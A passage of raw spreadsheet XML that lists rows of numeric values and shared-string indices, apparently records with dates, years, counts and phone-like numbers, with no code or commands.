      <c r="S968">
        <v>0</v>
      </c>
      <c r="T968">
        <v>0</v>
      </c>
      <c r="U968">
        <v>200</v>
      </c>
      <c r="V968">
        <v>0</v>
      </c>
      <c r="W968">
        <v>0</v>
      </c>
      <c r="X968">
        <v>0</v>
      </c>
      <c r="Y968">
        <v>0</v>
      </c>
      <c r="Z968">
        <v>0</v>
      </c>
      <c r="AA968">
        <v>0</v>
      </c>
      <c r="AB968">
        <v>0</v>
      </c>
      <c r="AC968">
        <v>220</v>
      </c>
      <c r="AD968">
        <v>0</v>
      </c>
      <c r="AE968">
        <v>0</v>
      </c>
      <c r="AF968" t="s">
        <v>7411</v>
      </c>
      <c r="AG968">
        <v>61217</v>
      </c>
      <c r="AH968">
        <v>16</v>
      </c>
      <c r="AJ968">
        <v>242</v>
      </c>
      <c r="AK968" t="s">
        <v>1894</v>
      </c>
      <c r="AL968" t="s">
        <v>7412</v>
      </c>
      <c r="AM968" t="s">
        <v>7413</v>
      </c>
      <c r="AN968" t="s">
        <v>55</v>
      </c>
      <c r="AO968">
        <v>2018</v>
      </c>
      <c r="AP968">
        <v>81357571011</v>
      </c>
      <c r="AQ968" t="s">
        <v>7414</v>
      </c>
      <c r="AR968" t="s">
        <v>7411</v>
      </c>
      <c r="AS968" t="s">
        <v>71</v>
      </c>
      <c r="AT968" t="s">
        <v>58</v>
      </c>
      <c r="AU968">
        <v>6</v>
      </c>
      <c r="AV968">
        <v>1</v>
      </c>
      <c r="AW968">
        <v>8</v>
      </c>
      <c r="AX968">
        <v>0</v>
      </c>
      <c r="AY968">
        <v>6</v>
      </c>
      <c r="AZ968">
        <v>0</v>
      </c>
      <c r="BA968" t="s">
        <v>17459</v>
      </c>
      <c r="BB968" t="s">
        <v>16044</v>
      </c>
      <c r="BC968" t="s">
        <v>11781</v>
      </c>
      <c r="BD968">
        <v>0</v>
      </c>
    </row>
    <row r="969" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A969">
        <v>4846</v>
      </c>
      <c r="B969" t="s">
        <v>7415</v>
      </c>
      <c r="C969" t="s">
        <v>157</v>
      </c>
      <c r="D969" t="s">
        <v>7416</v>
      </c>
      <c r="E969" t="s">
        <v>131</v>
      </c>
      <c r="F969" t="s">
        <v>1455</v>
      </c>
      <c r="G969" s="1">
        <v>44117</v>
      </c>
      <c r="H969">
        <v>5459</v>
      </c>
      <c r="I969">
        <v>5459</v>
      </c>
      <c r="J969">
        <v>0</v>
      </c>
      <c r="K969">
        <v>0</v>
      </c>
      <c r="L969">
        <v>0</v>
      </c>
      <c r="M969">
        <v>0</v>
      </c>
      <c r="N969">
        <v>0</v>
      </c>
      <c r="O969">
        <v>0</v>
      </c>
      <c r="P969">
        <v>0</v>
      </c>
      <c r="Q969">
        <v>7</v>
      </c>
      <c r="R969">
        <v>0</v>
      </c>
      <c r="S969">
        <v>0</v>
      </c>
      <c r="T969">
        <v>7</v>
      </c>
      <c r="U969">
        <v>0</v>
      </c>
      <c r="V969">
        <v>0</v>
      </c>
      <c r="W969">
        <v>0</v>
      </c>
      <c r="X969">
        <v>0</v>
      </c>
      <c r="Y969">
        <v>0</v>
      </c>
      <c r="Z969">
        <v>0</v>
      </c>
      <c r="AA969">
        <v>0</v>
      </c>
      <c r="AB969">
        <v>3000</v>
      </c>
      <c r="AC969">
        <v>0</v>
      </c>
      <c r="AD969">
        <v>0</v>
      </c>
      <c r="AE969">
        <v>500</v>
      </c>
      <c r="AF969" t="s">
        <v>7417</v>
      </c>
      <c r="AG969">
        <v>61316</v>
      </c>
      <c r="AH969">
        <v>16</v>
      </c>
      <c r="AJ969">
        <v>262</v>
      </c>
      <c r="AK969" t="s">
        <v>3883</v>
      </c>
      <c r="AL969" t="s">
        <v>7418</v>
      </c>
      <c r="AM969" t="s">
        <v>7419</v>
      </c>
      <c r="AN969" t="s">
        <v>82</v>
      </c>
      <c r="AO969">
        <v>1986</v>
      </c>
      <c r="AP969" t="s">
        <v>7420</v>
      </c>
      <c r="AQ969" t="s">
        <v>7421</v>
      </c>
      <c r="AR969" t="s">
        <v>7422</v>
      </c>
      <c r="AS969" t="s">
        <v>71</v>
      </c>
      <c r="AT969" t="s">
        <v>86</v>
      </c>
      <c r="AU969">
        <v>25</v>
      </c>
      <c r="AV969">
        <v>3</v>
      </c>
      <c r="AW969">
        <v>243</v>
      </c>
      <c r="AX969">
        <v>16</v>
      </c>
      <c r="AY969">
        <v>45</v>
      </c>
      <c r="AZ969">
        <v>3</v>
      </c>
      <c r="BA969" t="s">
        <v>17441</v>
      </c>
      <c r="BB969">
        <v>0</v>
      </c>
      <c r="BC969" t="s">
        <v>11160</v>
      </c>
      <c r="BD969">
        <v>0</v>
      </c>
    </row>
    <row r="970" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A970">
        <v>4820</v>
      </c>
      <c r="B970" t="s">
        <v>7423</v>
      </c>
      <c r="C970" t="s">
        <v>99</v>
      </c>
      <c r="D970" t="s">
        <v>7424</v>
      </c>
      <c r="E970" t="s">
        <v>142</v>
      </c>
      <c r="F970" t="s">
        <v>7425</v>
      </c>
      <c r="G970" s="1">
        <v>44103</v>
      </c>
      <c r="H970">
        <v>5476</v>
      </c>
      <c r="I970">
        <v>5476</v>
      </c>
      <c r="J970">
        <v>1</v>
      </c>
      <c r="K970">
        <v>0</v>
      </c>
      <c r="L970">
        <v>0</v>
      </c>
      <c r="M970">
        <v>0</v>
      </c>
      <c r="N970">
        <v>0</v>
      </c>
      <c r="O970">
        <v>0</v>
      </c>
      <c r="P970">
        <v>0</v>
      </c>
      <c r="Q970">
        <v>0</v>
      </c>
      <c r="R970">
        <v>0</v>
      </c>
      <c r="S970">
        <v>0</v>
      </c>
      <c r="T970">
        <v>0</v>
      </c>
      <c r="U970">
        <v>20000</v>
      </c>
      <c r="V970">
        <v>0</v>
      </c>
      <c r="W970">
        <v>0</v>
      </c>
      <c r="X970">
        <v>0</v>
      </c>
      <c r="Y970">
        <v>0</v>
      </c>
      <c r="Z970">
        <v>0</v>
      </c>
      <c r="AA970">
        <v>0</v>
      </c>
      <c r="AB970">
        <v>0</v>
      </c>
      <c r="AC970">
        <v>0</v>
      </c>
      <c r="AD970">
        <v>0</v>
      </c>
      <c r="AE970">
        <v>0</v>
      </c>
      <c r="AF970" t="s">
        <v>7426</v>
      </c>
      <c r="AG970">
        <v>14440</v>
      </c>
      <c r="AH970">
        <v>12</v>
      </c>
      <c r="AJ970">
        <v>160</v>
      </c>
      <c r="AK970" t="s">
        <v>114</v>
      </c>
      <c r="AL970" t="s">
        <v>114</v>
      </c>
      <c r="AM970" t="s">
        <v>7427</v>
      </c>
      <c r="AN970" t="s">
        <v>68</v>
      </c>
      <c r="AO970">
        <v>2020</v>
      </c>
      <c r="AP970" t="s">
        <v>7428</v>
      </c>
      <c r="AQ970" t="s">
        <v>7429</v>
      </c>
      <c r="AR970" t="s">
        <v>7426</v>
      </c>
      <c r="AS970" t="s">
        <v>71</v>
      </c>
      <c r="AT970" t="s">
        <v>72</v>
      </c>
      <c r="AU970">
        <v>6</v>
      </c>
      <c r="AV970">
        <v>0</v>
      </c>
      <c r="AW970">
        <v>0</v>
      </c>
      <c r="AX970">
        <v>0</v>
      </c>
      <c r="AY970">
        <v>9</v>
      </c>
      <c r="AZ970">
        <v>2</v>
      </c>
      <c r="BA970" t="s">
        <v>17426</v>
      </c>
      <c r="BB970">
        <v>0</v>
      </c>
      <c r="BC970">
        <v>0</v>
      </c>
      <c r="BD970">
        <v>0</v>
      </c>
    </row>
    <row r="971" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A971">
        <v>4885</v>
      </c>
      <c r="B971" t="s">
        <v>7430</v>
      </c>
      <c r="C971" t="s">
        <v>5506</v>
      </c>
      <c r="D971" t="s">
        <v>7431</v>
      </c>
      <c r="E971" t="s">
        <v>843</v>
      </c>
      <c r="F971" t="s">
        <v>7432</v>
      </c>
      <c r="G971" s="1">
        <v>44110</v>
      </c>
      <c r="H971">
        <v>5513</v>
      </c>
      <c r="I971">
        <v>5513</v>
      </c>
      <c r="J971">
        <v>0</v>
      </c>
      <c r="K971">
        <v>1</v>
      </c>
      <c r="L971">
        <v>0</v>
      </c>
      <c r="M971">
        <v>0</v>
      </c>
      <c r="N971">
        <v>0</v>
      </c>
      <c r="O971">
        <v>0</v>
      </c>
      <c r="P971">
        <v>0</v>
      </c>
      <c r="Q971">
        <v>0</v>
      </c>
      <c r="R971">
        <v>4</v>
      </c>
      <c r="S971">
        <v>0</v>
      </c>
      <c r="T971">
        <v>0</v>
      </c>
      <c r="U971">
        <v>0</v>
      </c>
      <c r="V971">
        <v>4000</v>
      </c>
      <c r="W971">
        <v>0</v>
      </c>
      <c r="X971">
        <v>0</v>
      </c>
      <c r="Y971">
        <v>0</v>
      </c>
      <c r="Z971">
        <v>0</v>
      </c>
      <c r="AA971">
        <v>0</v>
      </c>
      <c r="AB971">
        <v>0</v>
      </c>
      <c r="AC971">
        <v>4000</v>
      </c>
      <c r="AD971">
        <v>0</v>
      </c>
      <c r="AE971">
        <v>0</v>
      </c>
      <c r="AF971" t="s">
        <v>7433</v>
      </c>
      <c r="AG971">
        <v>85231</v>
      </c>
      <c r="AH971">
        <v>19</v>
      </c>
      <c r="AJ971">
        <v>314</v>
      </c>
      <c r="AK971" t="s">
        <v>5510</v>
      </c>
      <c r="AL971" t="s">
        <v>5510</v>
      </c>
      <c r="AM971" t="s">
        <v>7434</v>
      </c>
      <c r="AN971" t="s">
        <v>68</v>
      </c>
      <c r="AO971">
        <v>2020</v>
      </c>
      <c r="AP971">
        <v>8111893636</v>
      </c>
      <c r="AQ971" t="s">
        <v>7435</v>
      </c>
      <c r="AR971" t="s">
        <v>7433</v>
      </c>
      <c r="AS971" t="s">
        <v>71</v>
      </c>
      <c r="AT971" t="s">
        <v>72</v>
      </c>
      <c r="AU971">
        <v>22</v>
      </c>
      <c r="AV971">
        <v>1</v>
      </c>
      <c r="AW971">
        <v>0</v>
      </c>
      <c r="AX971">
        <v>0</v>
      </c>
      <c r="AY971">
        <v>10</v>
      </c>
      <c r="AZ971">
        <v>0</v>
      </c>
      <c r="BA971" t="s">
        <v>17465</v>
      </c>
      <c r="BB971" t="s">
        <v>16045</v>
      </c>
      <c r="BC971" t="s">
        <v>11790</v>
      </c>
      <c r="BD971" t="s">
        <v>11791</v>
      </c>
    </row>
    <row r="972" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A972">
        <v>4780</v>
      </c>
      <c r="B972" t="s">
        <v>7436</v>
      </c>
      <c r="C972" t="s">
        <v>4653</v>
      </c>
      <c r="D972" t="s">
        <v>7437</v>
      </c>
      <c r="E972" t="s">
        <v>49</v>
      </c>
      <c r="F972" t="s">
        <v>4037</v>
      </c>
      <c r="G972" s="1">
        <v>44116</v>
      </c>
      <c r="H972">
        <v>5525</v>
      </c>
      <c r="I972">
        <v>5525</v>
      </c>
      <c r="J972">
        <v>0</v>
      </c>
      <c r="K972">
        <v>0</v>
      </c>
      <c r="L972">
        <v>0</v>
      </c>
      <c r="M972">
        <v>0</v>
      </c>
      <c r="N972">
        <v>0</v>
      </c>
      <c r="O972">
        <v>0</v>
      </c>
      <c r="P972">
        <v>0</v>
      </c>
      <c r="Q972">
        <v>2</v>
      </c>
      <c r="R972">
        <v>0</v>
      </c>
      <c r="S972">
        <v>0</v>
      </c>
      <c r="T972">
        <v>0</v>
      </c>
      <c r="U972">
        <v>0</v>
      </c>
      <c r="V972">
        <v>0</v>
      </c>
      <c r="W972">
        <v>0</v>
      </c>
      <c r="X972">
        <v>0</v>
      </c>
      <c r="Y972">
        <v>0</v>
      </c>
      <c r="Z972">
        <v>0</v>
      </c>
      <c r="AA972">
        <v>0</v>
      </c>
      <c r="AB972">
        <v>15</v>
      </c>
      <c r="AC972">
        <v>0</v>
      </c>
      <c r="AD972">
        <v>0</v>
      </c>
      <c r="AE972">
        <v>0</v>
      </c>
      <c r="AF972" t="s">
        <v>7438</v>
      </c>
      <c r="AG972">
        <v>36557</v>
      </c>
      <c r="AH972">
        <v>7</v>
      </c>
      <c r="AJ972">
        <v>94</v>
      </c>
      <c r="AK972" t="s">
        <v>7439</v>
      </c>
      <c r="AL972" t="s">
        <v>7440</v>
      </c>
      <c r="AM972" t="s">
        <v>7441</v>
      </c>
      <c r="AN972" t="s">
        <v>68</v>
      </c>
      <c r="AO972">
        <v>2018</v>
      </c>
      <c r="AP972">
        <v>85268043702</v>
      </c>
      <c r="AQ972">
        <v>85268043702</v>
      </c>
      <c r="AR972" t="s">
        <v>7438</v>
      </c>
      <c r="AS972" t="s">
        <v>71</v>
      </c>
      <c r="AT972" t="s">
        <v>72</v>
      </c>
      <c r="AU972">
        <v>51</v>
      </c>
      <c r="AV972">
        <v>0</v>
      </c>
      <c r="AW972">
        <v>0</v>
      </c>
      <c r="AX972">
        <v>2</v>
      </c>
      <c r="AY972">
        <v>1</v>
      </c>
      <c r="AZ972">
        <v>2</v>
      </c>
      <c r="BA972" t="s">
        <v>17329</v>
      </c>
      <c r="BB972">
        <v>0</v>
      </c>
      <c r="BC972" t="s">
        <v>9791</v>
      </c>
      <c r="BD972">
        <v>0</v>
      </c>
    </row>
    <row r="973" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A973">
        <v>4826</v>
      </c>
      <c r="B973" t="s">
        <v>7442</v>
      </c>
      <c r="C973" t="s">
        <v>790</v>
      </c>
      <c r="D973" t="s">
        <v>7443</v>
      </c>
      <c r="E973" t="s">
        <v>142</v>
      </c>
      <c r="F973" t="s">
        <v>7444</v>
      </c>
      <c r="G973" s="1">
        <v>44067</v>
      </c>
      <c r="H973">
        <v>5532</v>
      </c>
      <c r="I973">
        <v>5532</v>
      </c>
      <c r="J973">
        <v>2</v>
      </c>
      <c r="K973">
        <v>2</v>
      </c>
      <c r="L973">
        <v>4</v>
      </c>
      <c r="M973">
        <v>0</v>
      </c>
      <c r="N973">
        <v>0</v>
      </c>
      <c r="O973">
        <v>0</v>
      </c>
      <c r="P973">
        <v>0</v>
      </c>
      <c r="Q973">
        <v>5</v>
      </c>
      <c r="R973">
        <v>5</v>
      </c>
      <c r="S973">
        <v>0</v>
      </c>
      <c r="T973">
        <v>0</v>
      </c>
      <c r="U973">
        <v>300000</v>
      </c>
      <c r="V973">
        <v>100000</v>
      </c>
      <c r="W973">
        <v>10000</v>
      </c>
      <c r="X973">
        <v>0</v>
      </c>
      <c r="Y973">
        <v>0</v>
      </c>
      <c r="Z973">
        <v>0</v>
      </c>
      <c r="AA973">
        <v>0</v>
      </c>
      <c r="AB973">
        <v>7500</v>
      </c>
      <c r="AC973">
        <v>7500</v>
      </c>
      <c r="AD973">
        <v>0</v>
      </c>
      <c r="AE973">
        <v>0</v>
      </c>
      <c r="AF973" t="s">
        <v>7445</v>
      </c>
      <c r="AG973">
        <v>93231</v>
      </c>
      <c r="AH973">
        <v>27</v>
      </c>
      <c r="AJ973">
        <v>438</v>
      </c>
      <c r="AK973" t="s">
        <v>7446</v>
      </c>
      <c r="AL973" t="s">
        <v>794</v>
      </c>
      <c r="AM973" t="s">
        <v>7447</v>
      </c>
      <c r="AN973" t="s">
        <v>68</v>
      </c>
      <c r="AO973">
        <v>2015</v>
      </c>
      <c r="AP973">
        <v>82195650970</v>
      </c>
      <c r="AQ973" t="s">
        <v>7448</v>
      </c>
      <c r="AR973" t="s">
        <v>7445</v>
      </c>
      <c r="AS973" t="s">
        <v>371</v>
      </c>
      <c r="AT973" t="s">
        <v>72</v>
      </c>
      <c r="AU973">
        <v>0</v>
      </c>
      <c r="AV973">
        <v>0</v>
      </c>
      <c r="AW973">
        <v>0</v>
      </c>
      <c r="AX973">
        <v>0</v>
      </c>
      <c r="AY973">
        <v>3</v>
      </c>
      <c r="AZ973">
        <v>9</v>
      </c>
      <c r="BA973" t="s">
        <v>17431</v>
      </c>
      <c r="BB973">
        <v>0</v>
      </c>
      <c r="BC973">
        <v>0</v>
      </c>
      <c r="BD973" t="s">
        <v>11740</v>
      </c>
    </row>
    <row r="974" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A974">
        <v>4904</v>
      </c>
      <c r="B974" t="s">
        <v>7449</v>
      </c>
      <c r="C974" t="s">
        <v>790</v>
      </c>
      <c r="D974" t="s">
        <v>7450</v>
      </c>
      <c r="E974" t="s">
        <v>142</v>
      </c>
      <c r="F974" t="s">
        <v>666</v>
      </c>
      <c r="G974" s="1">
        <v>44085</v>
      </c>
      <c r="H974">
        <v>5574</v>
      </c>
      <c r="I974">
        <v>5574</v>
      </c>
      <c r="J974">
        <v>2</v>
      </c>
      <c r="K974">
        <v>1</v>
      </c>
      <c r="L974">
        <v>2</v>
      </c>
      <c r="M974">
        <v>0</v>
      </c>
      <c r="N974">
        <v>0</v>
      </c>
      <c r="O974">
        <v>0</v>
      </c>
      <c r="P974">
        <v>0</v>
      </c>
      <c r="Q974">
        <v>3</v>
      </c>
      <c r="R974">
        <v>5</v>
      </c>
      <c r="S974">
        <v>0</v>
      </c>
      <c r="T974">
        <v>0</v>
      </c>
      <c r="U974">
        <v>6</v>
      </c>
      <c r="V974">
        <v>50</v>
      </c>
      <c r="W974">
        <v>6</v>
      </c>
      <c r="X974">
        <v>0</v>
      </c>
      <c r="Y974">
        <v>0</v>
      </c>
      <c r="Z974">
        <v>0</v>
      </c>
      <c r="AA974">
        <v>0</v>
      </c>
      <c r="AB974">
        <v>1</v>
      </c>
      <c r="AC974">
        <v>2</v>
      </c>
      <c r="AD974">
        <v>0</v>
      </c>
      <c r="AE974">
        <v>10</v>
      </c>
      <c r="AF974" t="s">
        <v>7451</v>
      </c>
      <c r="AG974">
        <v>93752</v>
      </c>
      <c r="AH974">
        <v>27</v>
      </c>
      <c r="AJ974">
        <v>423</v>
      </c>
      <c r="AK974" t="s">
        <v>7452</v>
      </c>
      <c r="AL974" t="s">
        <v>7453</v>
      </c>
      <c r="AM974" t="s">
        <v>7454</v>
      </c>
      <c r="AN974" t="s">
        <v>55</v>
      </c>
      <c r="AO974">
        <v>2019</v>
      </c>
      <c r="AP974">
        <v>85290663330</v>
      </c>
      <c r="AQ974" t="s">
        <v>7455</v>
      </c>
      <c r="AR974" t="s">
        <v>7456</v>
      </c>
      <c r="AS974" t="s">
        <v>71</v>
      </c>
      <c r="AT974" t="s">
        <v>58</v>
      </c>
      <c r="AU974">
        <v>20</v>
      </c>
      <c r="AV974">
        <v>2</v>
      </c>
      <c r="AW974">
        <v>32</v>
      </c>
      <c r="AX974">
        <v>10</v>
      </c>
      <c r="AY974">
        <v>36</v>
      </c>
      <c r="AZ974">
        <v>4</v>
      </c>
      <c r="BA974" t="s">
        <v>16051</v>
      </c>
      <c r="BB974" t="s">
        <v>16052</v>
      </c>
      <c r="BC974" t="s">
        <v>10003</v>
      </c>
      <c r="BD974">
        <v>0</v>
      </c>
    </row>
    <row r="975" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A975">
        <v>4878</v>
      </c>
      <c r="B975" t="s">
        <v>7457</v>
      </c>
      <c r="C975" t="s">
        <v>726</v>
      </c>
      <c r="D975" t="s">
        <v>7458</v>
      </c>
      <c r="E975" t="s">
        <v>111</v>
      </c>
      <c r="F975" t="s">
        <v>7459</v>
      </c>
      <c r="G975" s="1">
        <v>44113</v>
      </c>
      <c r="H975">
        <v>5583</v>
      </c>
      <c r="I975">
        <v>5583</v>
      </c>
      <c r="J975">
        <v>1</v>
      </c>
      <c r="K975">
        <v>0</v>
      </c>
      <c r="L975">
        <v>2</v>
      </c>
      <c r="M975">
        <v>0</v>
      </c>
      <c r="N975">
        <v>0</v>
      </c>
      <c r="O975">
        <v>0</v>
      </c>
      <c r="P975">
        <v>0</v>
      </c>
      <c r="Q975">
        <v>0</v>
      </c>
      <c r="R975">
        <v>10</v>
      </c>
      <c r="S975">
        <v>0</v>
      </c>
      <c r="T975">
        <v>0</v>
      </c>
      <c r="U975">
        <v>100000</v>
      </c>
      <c r="V975">
        <v>0</v>
      </c>
      <c r="W975">
        <v>10000</v>
      </c>
      <c r="X975">
        <v>0</v>
      </c>
      <c r="Y975">
        <v>0</v>
      </c>
      <c r="Z975">
        <v>0</v>
      </c>
      <c r="AA975">
        <v>0</v>
      </c>
      <c r="AB975">
        <v>0</v>
      </c>
      <c r="AC975">
        <v>20000</v>
      </c>
      <c r="AD975">
        <v>0</v>
      </c>
      <c r="AE975">
        <v>0</v>
      </c>
      <c r="AF975" t="s">
        <v>4879</v>
      </c>
      <c r="AG975">
        <v>97791</v>
      </c>
      <c r="AH975">
        <v>32</v>
      </c>
      <c r="AJ975">
        <v>466</v>
      </c>
      <c r="AK975" t="s">
        <v>7460</v>
      </c>
      <c r="AL975" t="s">
        <v>7461</v>
      </c>
      <c r="AM975" t="s">
        <v>7462</v>
      </c>
      <c r="AN975" t="s">
        <v>55</v>
      </c>
      <c r="AO975">
        <v>2014</v>
      </c>
      <c r="AP975">
        <v>81254775428</v>
      </c>
      <c r="AQ975" t="s">
        <v>7463</v>
      </c>
      <c r="AR975" t="s">
        <v>7464</v>
      </c>
      <c r="AS975" t="s">
        <v>71</v>
      </c>
      <c r="AT975" t="s">
        <v>58</v>
      </c>
      <c r="AU975">
        <v>25</v>
      </c>
      <c r="AV975">
        <v>0</v>
      </c>
      <c r="AW975">
        <v>45</v>
      </c>
      <c r="AX975">
        <v>5</v>
      </c>
      <c r="AY975">
        <v>2</v>
      </c>
      <c r="AZ975">
        <v>0</v>
      </c>
      <c r="BA975" t="s">
        <v>16755</v>
      </c>
      <c r="BB975" t="s">
        <v>16058</v>
      </c>
      <c r="BC975" t="s">
        <v>9693</v>
      </c>
      <c r="BD975" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="976" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A976">
        <v>4831</v>
      </c>
      <c r="B976" t="s">
        <v>7465</v>
      </c>
      <c r="C976" t="s">
        <v>157</v>
      </c>
      <c r="D976" t="s">
        <v>7466</v>
      </c>
      <c r="E976" t="s">
        <v>142</v>
      </c>
      <c r="F976" t="s">
        <v>7467</v>
      </c>
      <c r="G976" s="1">
        <v>44106</v>
      </c>
      <c r="H976">
        <v>5618</v>
      </c>
      <c r="I976">
        <v>5618</v>
      </c>
      <c r="J976">
        <v>1</v>
      </c>
      <c r="K976">
        <v>0</v>
      </c>
      <c r="L976">
        <v>2</v>
      </c>
      <c r="M976">
        <v>0</v>
      </c>
      <c r="N976">
        <v>0</v>
      </c>
      <c r="O976">
        <v>0</v>
      </c>
      <c r="P976">
        <v>0</v>
      </c>
      <c r="Q976">
        <v>4</v>
      </c>
      <c r="R976">
        <v>4</v>
      </c>
      <c r="S976">
        <v>0</v>
      </c>
      <c r="T976">
        <v>0</v>
      </c>
      <c r="U976">
        <v>200000</v>
      </c>
      <c r="V976">
        <v>0</v>
      </c>
      <c r="W976">
        <v>7000</v>
      </c>
      <c r="X976">
        <v>0</v>
      </c>
      <c r="Y976">
        <v>0</v>
      </c>
      <c r="Z976">
        <v>0</v>
      </c>
      <c r="AA976">
        <v>0</v>
      </c>
      <c r="AB976">
        <v>2000</v>
      </c>
      <c r="AC976">
        <v>2000</v>
      </c>
      <c r="AD976">
        <v>0</v>
      </c>
      <c r="AE976">
        <v>0</v>
      </c>
      <c r="AF976" t="s">
        <v>7468</v>
      </c>
      <c r="AG976">
        <v>65163</v>
      </c>
      <c r="AH976">
        <v>16</v>
      </c>
      <c r="AJ976">
        <v>234</v>
      </c>
      <c r="AK976" t="s">
        <v>7469</v>
      </c>
      <c r="AL976" t="s">
        <v>7470</v>
      </c>
      <c r="AM976" t="s">
        <v>7471</v>
      </c>
      <c r="AN976" t="s">
        <v>68</v>
      </c>
      <c r="AO976">
        <v>2019</v>
      </c>
      <c r="AP976">
        <v>81331817995</v>
      </c>
      <c r="AQ976" t="s">
        <v>7472</v>
      </c>
      <c r="AR976" t="s">
        <v>7468</v>
      </c>
      <c r="AS976" t="s">
        <v>71</v>
      </c>
      <c r="AT976" t="s">
        <v>72</v>
      </c>
      <c r="AU976">
        <v>25</v>
      </c>
      <c r="AV976">
        <v>1</v>
      </c>
      <c r="AW976">
        <v>6</v>
      </c>
      <c r="AX976">
        <v>6</v>
      </c>
      <c r="AY976">
        <v>3</v>
      </c>
      <c r="AZ976">
        <v>2</v>
      </c>
      <c r="BA976" t="s">
        <v>17434</v>
      </c>
      <c r="BB976">
        <v>0</v>
      </c>
      <c r="BC976" t="s">
        <v>9738</v>
      </c>
      <c r="BD976">
        <v>0</v>
      </c>
    </row>
    <row r="977" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A977">
        <v>4888</v>
      </c>
      <c r="B977" t="s">
        <v>7473</v>
      </c>
      <c r="C977" t="s">
        <v>47</v>
      </c>
      <c r="D977" t="s">
        <v>7474</v>
      </c>
      <c r="E977" t="s">
        <v>363</v>
      </c>
      <c r="F977" t="s">
        <v>7475</v>
      </c>
      <c r="G977" s="1">
        <v>44210</v>
      </c>
      <c r="H977">
        <v>5625</v>
      </c>
      <c r="I977">
        <v>5625</v>
      </c>
      <c r="J977">
        <v>1</v>
      </c>
      <c r="K977">
        <v>0</v>
      </c>
      <c r="L977">
        <v>0</v>
      </c>
      <c r="M977">
        <v>0</v>
      </c>
      <c r="N977">
        <v>0</v>
      </c>
      <c r="O977">
        <v>0</v>
      </c>
      <c r="P977">
        <v>0</v>
      </c>
      <c r="Q977">
        <v>0</v>
      </c>
      <c r="R977">
        <v>0</v>
      </c>
      <c r="S977">
        <v>0</v>
      </c>
      <c r="T977">
        <v>1</v>
      </c>
      <c r="U977">
        <v>200000</v>
      </c>
      <c r="V977">
        <v>0</v>
      </c>
      <c r="W977">
        <v>0</v>
      </c>
      <c r="X977">
        <v>0</v>
      </c>
      <c r="Y977">
        <v>0</v>
      </c>
      <c r="Z977">
        <v>0</v>
      </c>
      <c r="AA977">
        <v>0</v>
      </c>
      <c r="AB977">
        <v>0</v>
      </c>
      <c r="AC977">
        <v>0</v>
      </c>
      <c r="AD977">
        <v>0</v>
      </c>
      <c r="AE977">
        <v>1000</v>
      </c>
      <c r="AF977" t="s">
        <v>7476</v>
      </c>
      <c r="AG977">
        <v>21473</v>
      </c>
      <c r="AH977">
        <v>2</v>
      </c>
      <c r="AJ977">
        <v>30</v>
      </c>
      <c r="AK977" t="s">
        <v>7477</v>
      </c>
      <c r="AL977" t="s">
        <v>7478</v>
      </c>
      <c r="AM977" t="s">
        <v>7479</v>
      </c>
      <c r="AN977" t="s">
        <v>55</v>
      </c>
      <c r="AO977">
        <v>2020</v>
      </c>
      <c r="AP977">
        <v>85261629608</v>
      </c>
      <c r="AQ977" t="s">
        <v>7480</v>
      </c>
      <c r="AR977" t="s">
        <v>7476</v>
      </c>
      <c r="AS977" t="s">
        <v>71</v>
      </c>
      <c r="AT977" t="s">
        <v>58</v>
      </c>
      <c r="AU977">
        <v>365</v>
      </c>
      <c r="AV977">
        <v>1</v>
      </c>
      <c r="AW977">
        <v>5</v>
      </c>
      <c r="AX977">
        <v>10</v>
      </c>
      <c r="AY977">
        <v>5</v>
      </c>
      <c r="AZ977">
        <v>6</v>
      </c>
      <c r="BA977" t="s">
        <v>17468</v>
      </c>
      <c r="BB977">
        <v>0</v>
      </c>
      <c r="BC977">
        <v>0</v>
      </c>
      <c r="BD977" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="978" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A978">
        <v>4887</v>
      </c>
      <c r="B978" t="s">
        <v>7481</v>
      </c>
      <c r="C978" t="s">
        <v>3013</v>
      </c>
      <c r="D978" t="s">
        <v>7482</v>
      </c>
      <c r="E978" t="s">
        <v>1876</v>
      </c>
      <c r="F978" t="s">
        <v>7483</v>
      </c>
      <c r="G978" s="1">
        <v>44074</v>
      </c>
      <c r="H978">
        <v>5633</v>
      </c>
      <c r="I978">
        <v>5633</v>
      </c>
      <c r="J978">
        <v>4</v>
      </c>
      <c r="K978">
        <v>4</v>
      </c>
      <c r="L978">
        <v>0</v>
      </c>
      <c r="M978">
        <v>0</v>
      </c>
      <c r="N978">
        <v>0</v>
      </c>
      <c r="O978">
        <v>0</v>
      </c>
      <c r="P978">
        <v>0</v>
      </c>
      <c r="Q978">
        <v>10</v>
      </c>
      <c r="R978">
        <v>45</v>
      </c>
      <c r="S978">
        <v>0</v>
      </c>
      <c r="T978">
        <v>1</v>
      </c>
      <c r="U978">
        <v>100</v>
      </c>
      <c r="V978">
        <v>300</v>
      </c>
      <c r="W978">
        <v>0</v>
      </c>
      <c r="X978">
        <v>0</v>
      </c>
      <c r="Y978">
        <v>0</v>
      </c>
      <c r="Z978">
        <v>0</v>
      </c>
      <c r="AA978">
        <v>0</v>
      </c>
      <c r="AB978">
        <v>100</v>
      </c>
      <c r="AC978">
        <v>100</v>
      </c>
      <c r="AD978">
        <v>0</v>
      </c>
      <c r="AE978">
        <v>2000</v>
      </c>
      <c r="AF978" t="s">
        <v>7484</v>
      </c>
      <c r="AG978">
        <v>28292</v>
      </c>
      <c r="AH978">
        <v>4</v>
      </c>
      <c r="AJ978">
        <v>86</v>
      </c>
      <c r="AK978" t="s">
        <v>7485</v>
      </c>
      <c r="AL978" t="s">
        <v>7486</v>
      </c>
      <c r="AM978" t="s">
        <v>7487</v>
      </c>
      <c r="AN978" t="s">
        <v>68</v>
      </c>
      <c r="AO978">
        <v>2019</v>
      </c>
      <c r="AP978">
        <v>83197674057</v>
      </c>
      <c r="AQ978" t="s">
        <v>7488</v>
      </c>
      <c r="AR978" t="s">
        <v>7484</v>
      </c>
      <c r="AS978" t="s">
        <v>179</v>
      </c>
      <c r="AT978" t="s">
        <v>72</v>
      </c>
      <c r="AU978">
        <v>25</v>
      </c>
